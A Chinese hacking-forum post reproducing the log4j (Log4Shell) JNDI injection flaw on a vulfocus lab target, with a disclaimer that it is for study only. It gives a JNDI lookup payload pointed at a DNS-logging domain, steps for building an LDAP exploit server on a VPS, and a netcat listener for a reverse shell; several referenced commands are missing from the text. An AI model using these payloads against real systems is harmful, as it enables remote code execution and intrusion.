1
2
5
新手上路
2021/12/09,阿里云安全团队向apache报告了由log4j日志引起的远程代码执行,12月10日,当天白帽跟提前过大年似的,疯狂刷src(利用超级简单),让部分src平台暂时停止收类似该漏洞,凌晨,很多程序员和安全员被迫起来应急响应,几乎市面上的大厂都受到了该漏洞的影响
apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响,建议使用了相关版本的应用或者插件,尽快升级修补,做好相关方措施,避免造成不必要的损失1.1漏洞描述
根据网上公开的信息来看,目前一下组件是已知搜受影响的插件
测试POC: 如果是仅作是否存在该漏洞测试,使用这条payload即可 payload: ${jndi:idap://[这里填写在上面提到的dns platform 中获取到的dns域名]}
本地测试: Github: https://github.com/fengxuangit/log4j_vuln
这里以vulfocus靶场进行复现,本文目的是为了让学习和研究该漏洞,禁用用于任何非法行为
最好是配置jdk1.8.0_172的版本,更高的版本可以无法利用成功 在反弹shell同时,需要在vps本地构建一个ldap服务
使用mvn构建完成后,会在该文件夹下新建一个target的文件夹,记录该文件夹
访问地址根据给出的为准
注意:题目url要加/hello,并且要以post的方式定义payload值进行传参) 即:url/hello POSTDATA:payload=xxxxxxxx
在本文上面的第四点讲到的dnslog platform中任意找一个可用的dnslog平台获取一个dns,然后构造payload测试是否存在漏洞 payload传入成功会回显ok Got SubDomain :获取dns Rcfrcsh Rcord :获取目标是否有解析会回来,如果有的话,说明该站可能纯在log4j的漏洞
传入payload (${jndi:idap://[这里填写在上面提到的dns platform 中获取到的dns域名]})
回到dnslog platform查看是否有解析记录
如果dnslog platform返回了类似上面的内容的花,即证明该漏洞存在切可用
使用到第一步搭建好的 JNDI-Injection-Exploit 在JNDI-Injection-Exploit目录下执行
比如这样子
另起终端,打开nc -lvp 端口 进行监听
vulfocus的靶机,用类似下面这个payload
所有漏洞复现文章仅供学习交流使用,禁止用于非法用途!!!!!!!!!!!!!!!!!!
使用道具 举报
0
4
本版积分规则 发表回复 回帖后跳转到最后一页
Archiver|手机版|小黑屋| 黑客通
GMT+8, 2025-4-6 17:24 , Processed in 0.385747 second(s), 59 queries .
Powered by Discuz! X3.4
Copyright © 2020, LianLian.